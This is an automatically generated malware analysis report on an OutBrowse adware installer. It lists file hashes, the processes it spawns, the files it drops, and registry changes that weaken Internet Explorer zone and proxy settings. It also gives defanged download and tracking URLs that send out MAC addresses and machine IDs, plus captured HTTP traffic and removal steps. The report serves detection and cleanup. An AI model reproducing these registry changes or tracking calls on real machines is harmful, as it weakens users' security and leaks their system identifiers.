not-a-virus:HEUR:AdWare.Win32.OutBrowse.heur (Kaspersky), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 7d4b556f36f5170d24469ffd6280298b
SHA1: 3b25c05b56bb109230cd4c19ed822c0f997bd01a
SHA256: 1269ba5a14bb2f174c71e918d07017fa69e4f9ca331ad20752df4184ad3dfd06
SSDeep: 6144: FJ0dzqwtk8qPKWbvC6ArChkap8mY5XE8HjZ4kO40FWrCTL8UU qr:vzDtXqdbvCfO8TNECjA4J0LGtr
Size: 354880 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: CGJTA
Created at: 2009-12-06 00:52:12
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
TFFFL1BTSQ==107:508
TFFFL1BTSQ==29820.exe:236
wmic.exe:1336
%original file name%.exe:1772
The Trojan injects its code into the following process(es):
beehjjcbdh.exe:644
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process TFFFL1BTSQ==107:508 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (0 bytes)
The process TFFFL1BTSQ==29820.exe:236 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp (0 bytes)
The process wmic.exe:1336 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\81450579259.txt (238 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\81450579259.txt (0 bytes)
The process %original file name%.exe:1772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\beehjjcbdh.exe (19233 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1.tmp (0 bytes)
The process beehjjcbdh.exe:644 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QCSHYWFB\dc[1].js (1327 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OCA8BILW\DynamicOfferScreen[1].htm (2083 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\81450579259\TFFFL1BTSQ==29820.exe (2773 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ADSQWDZ1\OperaChecker25-6[1].exe (3762 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OCA8BILW\button[1].png (458 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\VB2DLJ79\button_over[1].png (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\81450579259\TFFFL1BTSQ==10700.exe (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\VB2DLJ79\XPLimitChecker[1].exe (6666 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ADSQWDZ1\bodyImg[1].png (1 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\81450579259.txt (0 bytes)
Registry activity
The process TFFFL1BTSQ==107:508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 61 58 84 48 53 42 E9 4C C1 93 2F 57 81 1A 29"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\OperaOB]
"Install" = "1"
The process TFFFL1BTSQ==29820.exe:236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 2D B7 E1 9B 0B 45 B1 AD 86 36 F6 0C DE EB DC"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\xplmtOB]
"Install" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process wmic.exe:1336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 8C A3 90 A3 14 4D 40 AC 8F 4A DB AC CB 69 8F"
The process %original file name%.exe:1772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 AF 69 8D 89 73 2D 8A 27 A9 64 7D 54 82 A1 04"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process beehjjcbdh.exe:644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 02 4C C8 1B 12 23 67 53 55 8D BE 2D C8 44 A9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
10ffabc748d68c40b68f883058c9b932 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\81450579259\TFFFL1BTSQ==10700.exe |
b6631cd12092841cac0763c854828c50 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\81450579259\TFFFL1BTSQ==29820.exe |
1bea8f62a73cf66e445bfd963845c8b7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\beehjjcbdh.exe |
10ffabc748d68c40b68f883058c9b932 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\ADSQWDZ1\OperaChecker25-6[1].exe |
b6631cd12092841cac0763c854828c50 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\VB2DLJ79\XPLimitChecker[1].exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
TFFFL1BTSQ==107:508
TFFFL1BTSQ==29820.exe:236
wmic.exe:1336
%original file name%.exe:1772 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\81450579259.txt (238 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\beehjjcbdh.exe (19233 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QCSHYWFB\dc[1].js (1327 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OCA8BILW\DynamicOfferScreen[1].htm (2083 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\81450579259\TFFFL1BTSQ==29820.exe (2773 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ADSQWDZ1\OperaChecker25-6[1].exe (3762 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OCA8BILW\button[1].png (458 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\VB2DLJ79\button_over[1].png (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\81450579259\TFFFL1BTSQ==10700.exe (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\VB2DLJ79\XPLimitChecker[1].exe (6666 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ADSQWDZ1\bodyImg[1].png (1 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: CGJTA
Product Name: CGJTA
Product Version: 773.151120.1374.5770
Legal Copyright: CGJTA
Legal Trademarks: CGJTA
Original Filename:
Internal Name:
File Version: 773.151120.1374.5770
File Description: CGJTA
Comments: CGJTA
Language: English (United States)
Company Name: CGJTAProduct Name: CGJTAProduct Version: 773.151120.1374.5770Legal Copyright: CGJTALegal Trademarks: CGJTAOriginal Filename: Internal Name: File Version: 773.151120.1374.5770File Description: CGJTAComments: CGJTALanguage: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46304 | c52a72deb0170941d392ec38c6aeafd0 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 298072 | 1024 | 3.32453 | 723ad80df002dc5421798f4307abe5cf |
.ndata | 335872 | 311296 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 647168 | 54360 | 54784 | 2.83685 | 1497236056b7ef8b553448fb47c71fdf |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 117
03654a08e7f65aec190ee7e37246bb5f
a212f888d46a7e2d8802888390ff3c63
470ab50ccb81409a49b2abb4c05af91f
ee0edf52085544dd5ffae3892bd06855
07da75d17d57e9bbfa0916a2ad8b95b6
e74d8056cde545c3960d49ca018101bb
e5c5fddf9ff161c0d6de11988f8358c7
38623bf8200680f3967022fd39f52daf
fad9fe2f4d34a9a3943bbf54dfc38c01
1b45146c52aa1976ffcf47b50c6e4c7c
27967ee4c772b29835d5dba868867879
22dc967254eef4719b3c514ab7029cdb
18ed19164cd0f258338a661057321695
e9197129bf89c13fa74f5e0219c735ae
32d708fbb109abf91c1a372351481a8e
cae50b748f98679ee3004f13687fdc34
c2297a50a1f58665aa97177a0357616e
9398d852900b4c351c5b8e38699dcd70
2f81cfbd26709f9f88985ed83777256d
562eb5ad8564d3591007404a367df858
02c83ab655f98711ad1fbb3123b78438
6daeb82e5bcd31515b4a926d6cba88b3
f9b90420cd1aef0263de7ca339f8947b
63745fe6fef243a667c80f8d31228f33
ad9ae311a36924f84d2f4d7c9571f8a2
Network Activity
URLs
URL | IP |
---|---|
hxxp://cdn-ppdownload.outbrowse.netdna-cdn.com/Installer/OperaBrowser/OperaChecker25-6.exe | |
hxxp://d2vubraihqcany.cloudfront.net/Installer/XP/XPLimitChecker.exe | 216.137.59.225 |
hxxp://smartinstaller.elasticbeanstalk.com/Installer/Track?pubid=16434&distid=30338&productid=29565&subpubid=0&campaignid=0&networkid=1&reqid=382014019&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:8A:8B:37&netv=&d1=-1&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&cookieproductname=85-112-100-97-116-101-115&cookieeula=&cookieprivacy=&hb=5&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=77.241.45.41&downloadtime=11/20/2015 6:14:41 AM&clickid=&status=2&installedid=29820&z=1&offerscreenid=655&offerorder=-1&downloadduration=-1&installduration=-1&issecond=0 | |
hxxp://smartinstaller.elasticbeanstalk.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0& | |
hxxp://stats.l.doubleclick.net/dc.js | |
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/topComp.png | |
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/topLine.jpg | |
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/bgImg.jpg | |
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/bodyImg.png | |
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/bottomLine.jpg | |
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/nextCase.jpg | |
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/button_over.png | |
hxxp://staticrevenyou.outbrowse.netdna-cdn.com/offers/images/Theme12/button.png | |
hxxp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0& | 54.225.173.140 |
hxxp://static.revenyou.com/offers/images/Theme12/nextCase.jpg | 198.232.124.224 |
hxxp://static.revenyou.com/offers/images/Theme12/bgImg.jpg | 198.232.124.224 |
hxxp://srv.DESK-TOP-APP.INFO/Installer/Flow?pubid=16434&distid=30338&productid=29565&subpubid=0&campaignid=0&networkid=1&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:8A:8B:37&netv=&d1=-1&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&cookieproductname=85-112-100-97-116-101-115&cookieeula=&cookieprivacy=&hb=5&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=77.241.45.41&downloadtime=11/20/2015 6:14:41 AM&clickid=&version=6.12 | |
hxxp://static.revenyou.com/offers/images/Theme12/bodyImg.png | 198.232.124.224 |
hxxp://srv.DESK-TOP-APP.INFO/Installer/Track?pubid=16434&distid=30338&productid=29565&subpubid=0&campaignid=0&networkid=1&reqid=382014019&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:8A:8B:37&netv=&d1=-1&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&cookieproductname=85-112-100-97-116-101-115&cookieeula=&cookieprivacy=&hb=5&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=77.241.45.41&downloadtime=11/20/2015 6:14:41 AM&clickid=&status=2&installedid=10700&z=1&offerscreenid=234&offerorder=-1&downloadduration=-1&installduration=-1&issecond=0 | |
hxxp://static.revenyou.com/offers/images/Theme12/topComp.png | 198.232.124.224 |
hxxp://srv.DESK-TOP-APP.INFO/Installer/Track?pubid=16434&distid=30338&productid=29565&subpubid=0&campaignid=0&networkid=1&reqid=382014019&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:8A:8B:37&netv=&d1=-1&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&cookieproductname=85-112-100-97-116-101-115&cookieeula=&cookieprivacy=&hb=5&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=77.241.45.41&downloadtime=11/20/2015 6:14:41 AM&clickid=&status=2&installedid=29820&z=1&offerscreenid=655&offerorder=-1&downloadduration=-1&installduration=-1&issecond=0 | |
hxxp://stats.g.doubleclick.net/dc.js | 64.233.165.156 |
hxxp://srv.DESK-TOP-APP.INFO/Installer/Flow?pubid=16434&distid=30338&productid=29565&subpubid=0&campaignid=0&networkid=1&dfb=0&os=5.1&ospv=-1&iev=6.0&ffv=&chromev=&macaddress=00:0C:29:8A:8B:37&netv=&d1=-1&d2=-1&d3=-1&d4=-1&d5=-1&ds1=&cookieproductname=85-112-100-97-116-101-115&cookieeula=&cookieprivacy=&hb=5&systembit=32&vm=1&machineguid=75ed9567-aa58-4c8e-a8ea-3cad7c47ab03&welcomeimgurl=&downloadip=77.241.45.41&downloadtime=11/20/2015 6:14:41 AM&clickid=&version=6.12&nipids=-29408-28693-28657-29219-29736&secondcall=1&reqid=382014019 | |
hxxp://static.revenyou.com/offers/images/Theme12/topLine.jpg | 198.232.124.224 |
hxxp://cdn.download4desktop.com/Installer/OperaBrowser/OperaChecker25-6.exe | 198.232.124.192 |
hxxp://static.revenyou.com/offers/images/Theme12/bottomLine.jpg | 198.232.124.224 |
hxxp://static.revenyou.com/offers/images/Theme12/button.png | 198.232.124.224 |
hxxp://static.revenyou.com/offers/images/Theme12/button_over.png | 198.232.124.224 |
srv.desk-top-app.info | 23.21.167.85 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET //offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0& HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: srv.serverdatasrv.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 20 Dec 2015 02:41:06 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 4.0
X-Powered-By: ASP.NET
Content-Length: 12892
Connection: keep-alive
<html>. <head>. <title>5 - NonProduct (Download Manager)</title><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(['_setAccount', 'UA-37348037-1']);_gaq.push(['_setDomainName', 'ppdownload.com']);_gaq.push(['_setAllowLinker', true]);.. _gaq.push(['_trackPageview']);.. (function() {.. var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;.. ga.src = ('https:' == document.location.protocol ? 'hXXps://' : 'hXXp://') 'stats.g.doubleclick.net/dc.js';.. var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);.. })();</script><style type='text/css'>body { width:100%; height:100%; margin:0px; padding:0px; font-size:font-family:helvetica; font-size:12px;} .divLeadpName { border-bottom-style:groove;border-bottom-width: thin; padding-left:61px; padding-top:9px; font-size:font-family:helvetica; font-style:italic; font-size:25px; font-weight:bold; color:black; position:absolute; width: 100%; background-color: #fff; ba} #divTop {display: none} #divMiddle {background-color: #efecec; height: 100%;} #middle {background-color: #fff;} .divOnNext { position:absolute;
<<< skipped >>>
GET /offers/images/Theme12/topComp.png HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Date: Sun, 20 Dec 2015 02:41:07 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="content-container"><fieldset>.. <h2>404 - File or directory not found.</h2>.. <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>.. </fieldset></div>..</div>..</body>..</html>......
<<< skipped >>>
GET /offers/images/Theme12/bgImg.jpg HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Date: Sun, 20 Dec 2015 02:41:07 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="content-container"><fieldset>.. <h2>404 - File or directory not found.</h2>.. <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>.. </fieldset></div>..</div>..</body>..</html>......
<<< skipped >>>
GET /offers/images/Theme12/nextCase.jpg HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30338&leadp=29565&countryid=262&sysbit=32&imgurl=&cookieproductname=85-112-100-97-116-101-115&dfb=0&hb=5&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: static.revenyou.com
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Date: Sun, 20 Dec 2015 02:41:08 GMT
Content-Type: text/html
Content-Length: 1245
Connection: keep-alive
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="content-container"><fieldset>.. <h2>404 - File or directory not found.</h2>.. <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>.. </fieldset></div>..</div>..</body>..</html>..HTTP/1.1 404 Not Found..Date: Sun, 20 Dec 2015 02:41:08 GMT..Content-Type: text/html..Content-Length: 1245..Connection: keep-aliv
<<< skipped >>>
GET /offers/images/Theme12/topLine.jpg HTTP/1.1
Accept: */*
